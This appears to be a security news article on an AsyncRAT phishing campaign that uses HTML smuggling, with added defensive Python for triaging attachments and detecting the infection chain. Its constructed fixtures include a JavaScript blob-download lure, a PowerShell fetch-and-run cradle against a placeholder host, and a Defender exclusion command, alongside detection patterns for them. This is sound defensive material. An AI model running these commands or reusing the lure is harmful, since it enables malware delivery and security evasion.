Last Updated on 27/01/2022 by Nidhi Khandelwal
A new, sophisticated phishing campaign, active since September 2021, has been identified delivering the AsyncRAT trojan.
The attacks start with an email carrying an HTML attachment that poses as an order confirmation receipt (for example, Receipt-<digits>.html). When the recipient opens the decoy file, they land on a web page that prompts them to save an ISO file.
Unlike earlier RAT campaigns that send victims to a phishing URL set up specifically to serve the next-stage malware, this campaign uses JavaScript to construct the ISO file locally from Base64-encoded text embedded in the attachment and to mimic a download (a technique known as HTML smuggling). Because the payload never travels over the network as a separate file, URL-based and download-proxy controls see only the HTML attachment.
“A JavaScript code hidden inside the HTML receipt file generates the ISO download from within the victim’s browser, not from a distant server,” Dereviashkin added.
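The practical question for a responder is how to confirm, without a browser, that an HTML attachment carries a smuggled ISO. The following Python script is an added example written for this page, not code from the original article or from the campaign itself: it pulls long Base64 runs out of the attachment's `<script>` blocks, decodes them, and identifies the result by magic bytes (an ISO 9660 image has the identifier `CD001` at byte offset 0x8001, right after the primary volume descriptor's type byte). The sample attachment it analyses is constructed inline to resemble the described lure; the JavaScript it contains, the file name `Receipt.iso` and the payload bytes are all assumptions, not the real sample.

```python
import base64
import hashlib
import json
import re

# ISO 9660: the primary volume descriptor starts at sector 16 (16 * 2048 = 0x8000);
# byte 0x8000 is the descriptor type and bytes 0x8001..0x8005 are the identifier "CD001".
ISO_MAGIC_OFFSET = 0x8001
ISO_MAGIC = b"CD001"

# Browser APIs a page uses to materialise a file from in-memory bytes and push it to disk.
SMUGGLING_API_HINTS = ("atob(", "Uint8Array", "new Blob", "createObjectURL",
                       "msSaveOrOpenBlob", ".download")

# Base64 runs long enough to be a payload rather than an inline icon or font.
B64_RE = re.compile(r"[A-Za-z0-9+/]{2048,}={0,2}")
SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.IGNORECASE | re.DOTALL)
# Matches both the HTML attribute download="x" and the JS assignment a.download = "x".
DOWNLOAD_NAME_RE = re.compile(r"""download\s*=\s*["']([^"']+)["']""")


def identify_payload(data: bytes) -> str:
    """Classify a decoded blob by magic bytes (ISO image, PE executable, ZIP, or unknown)."""
    if data[ISO_MAGIC_OFFSET:ISO_MAGIC_OFFSET + len(ISO_MAGIC)] == ISO_MAGIC:
        return "iso9660"
    if data[:2] == b"MZ":
        return "pe"
    if data[:4] == b"PK\x03\x04":
        return "zip"
    return "unknown"


def triage_html(html: str) -> dict:
    """Static triage of an HTML attachment: smuggling APIs used, decoded payloads, target file names."""
    scripts = "\n".join(SCRIPT_RE.findall(html))
    hints = [h for h in SMUGGLING_API_HINTS if h in scripts]
    payloads = []
    for m in B64_RE.finditer(scripts):
        try:
            blob = base64.b64decode(m.group(0), validate=True)
        except ValueError:
            # Not clean Base64: chunked, reversed or otherwise obfuscated encodings
            # need the script's own decoding logic to be replayed first.
            continue
        payloads.append({"type": identify_payload(blob), "size": len(blob),
                         "sha256": hashlib.sha256(blob).hexdigest()})
    names = DOWNLOAD_NAME_RE.findall(scripts) or DOWNLOAD_NAME_RE.findall(html)
    # A decoded payload plus at least two file-materialising APIs is a strong smuggling signal.
    suspicious = bool(payloads) and len(hints) >= 2
    return {"smuggling_apis": hints, "payloads": payloads,
            "download_names": names, "suspicious": suspicious}


def build_sample_attachment() -> str:
    """Constructed lure resembling the described receipt page (an assumption, not the real sample)."""
    iso = bytearray(ISO_MAGIC_OFFSET + len(ISO_MAGIC) + 100)   # 32874 zero bytes
    iso[ISO_MAGIC_OFFSET:ISO_MAGIC_OFFSET + len(ISO_MAGIC)] = ISO_MAGIC
    b64 = base64.b64encode(bytes(iso)).decode()
    return f"""<html><body><p>Your order has been confirmed. Preparing your receipt...</p>
<script>
var data = atob("{b64}");
var bytes = new Uint8Array(data.length);
for (var i = 0; i < data.length; i++) bytes[i] = data.charCodeAt(i);
var blob = new Blob([bytes], {{type: "application/octet-stream"}});
var a = document.createElement("a");
a.href = URL.createObjectURL(blob);
a.download = "Receipt.iso";
document.body.appendChild(a); a.click();
</script></body></html>"""


if __name__ == "__main__":
    print(json.dumps(triage_html(build_sample_attachment()), indent=2))
```

Run the script against a saved attachment by passing its contents to `triage_html`; the `sha256` of each decoded payload is what you would submit to a sandbox or compare against intelligence, since the HTML wrapper's hash changes per victim while the smuggled ISO often does not.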
When the victim opens the ISO file, Windows mounts it as a DVD drive. The image contains either a .BAT or a .VBS file that continues the infection chain by running a PowerShell command to fetch the next-stage component.
That component is a .NET module executed in memory, which acts as a dropper for three files, each triggering the next, with AsyncRAT as the final payload. Along the way it checks for installed antivirus products and adds Windows Defender exclusions so that later stages are not scanned.
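The chain above is what an endpoint detection should key on: a script host launched from a freshly mounted volume, a PowerShell download cradle beneath it, and Defender exclusions being added by the same process tree. The Python below is an added example for this page, not detection content from the original article or from any product; it runs three such rules over a small set of constructed process-creation events (a simplified schema of pid, parent pid, image and command line, not a real Sysmon or EDR format) and reconstructs the ancestry of each hit. The drive letter `D:`, the script name `Receipt.vbs`, the URL `http://example.invalid/stage2` and the exclusion path are placeholders, not indicators from the campaign.

```python
import ntpath
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "cmd.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# A mounted ISO gets a new drive letter, so a .vbs/.bat opened from a non-system drive
# straight from the user's shell is the lure being double-clicked (heuristic; tune per site).
MOUNTED_SCRIPT_RE = re.compile(r"[D-Zd-z]:\\\S*?\.(vbs|bat|cmd)\b", re.IGNORECASE)
# Common PowerShell download-and-execute primitives.
CRADLE_RE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|"
                       r"Invoke-Expression|\bIEX\b|FromBase64String", re.IGNORECASE)
# Defender tampering via the MpPreference cmdlets.
DEFENDER_TAMPER_RE = re.compile(r"(Add|Set)-MpPreference\b.*?-(ExclusionPath|ExclusionProcess|"
                                r"ExclusionExtension|DisableRealtimeMonitoring)", re.IGNORECASE)

# Constructed events mirroring the described chain plus one benign PowerShell launch.
EVENTS = [
    {"pid": 400, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 412, "ppid": 400, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "D:\Receipt.vbs"'},
    {"pid": 418, "ppid": 412, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('http://example.invalid/stage2')\""},
    {"pid": 425, "ppid": 418, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -c \"Add-MpPreference -ExclusionPath 'C:\\Users\\Public'\""},
    {"pid": 500, "ppid": 400, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoProfile -c Get-Date"},
]


def image_name(path: str) -> str:
    return ntpath.basename(path).lower()


def ancestry(by_pid: dict, pid: int) -> list:
    """Image names from the root-most known ancestor down to pid (cycle-safe)."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(image_name(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return list(reversed(chain))


def detect(events: list) -> list:
    """Apply the three rules and return findings with the reconstructed process chain."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        name, cmd = image_name(e["image"]), e["cmdline"]
        chain = ancestry(by_pid, e["pid"])
        if (name in SCRIPT_HOSTS and MOUNTED_SCRIPT_RE.search(cmd)
                and len(chain) >= 2 and chain[-2] == "explorer.exe"):
            findings.append({"pid": e["pid"], "rule": "script_from_mounted_volume",
                             "severity": "medium", "chain": chain})
        if name in POWERSHELL:
            if CRADLE_RE.search(cmd):
                # A script host in the ancestry means the cradle was launched by the lure, not by an admin.
                sev = "high" if any(p in SCRIPT_HOSTS for p in chain[:-1]) else "medium"
                findings.append({"pid": e["pid"], "rule": "powershell_download_cradle",
                                 "severity": sev, "chain": chain})
            if DEFENDER_TAMPER_RE.search(cmd):
                findings.append({"pid": e["pid"], "rule": "defender_exclusion_tamper",
                                 "severity": "high", "chain": chain})
    return findings


if __name__ == "__main__":
    for f in detect(EVENTS):
        print(f["severity"], f["rule"], f["pid"], " -> ".join(f["chain"]))
```

The in-memory .NET stages leave no command line to match, which is why the rules anchor on the observable edges of the chain (the script host, the cradle, the exclusion change) rather than on the payload itself; pairing the last rule with Defender's own event log for exclusion changes gives a second, independent source.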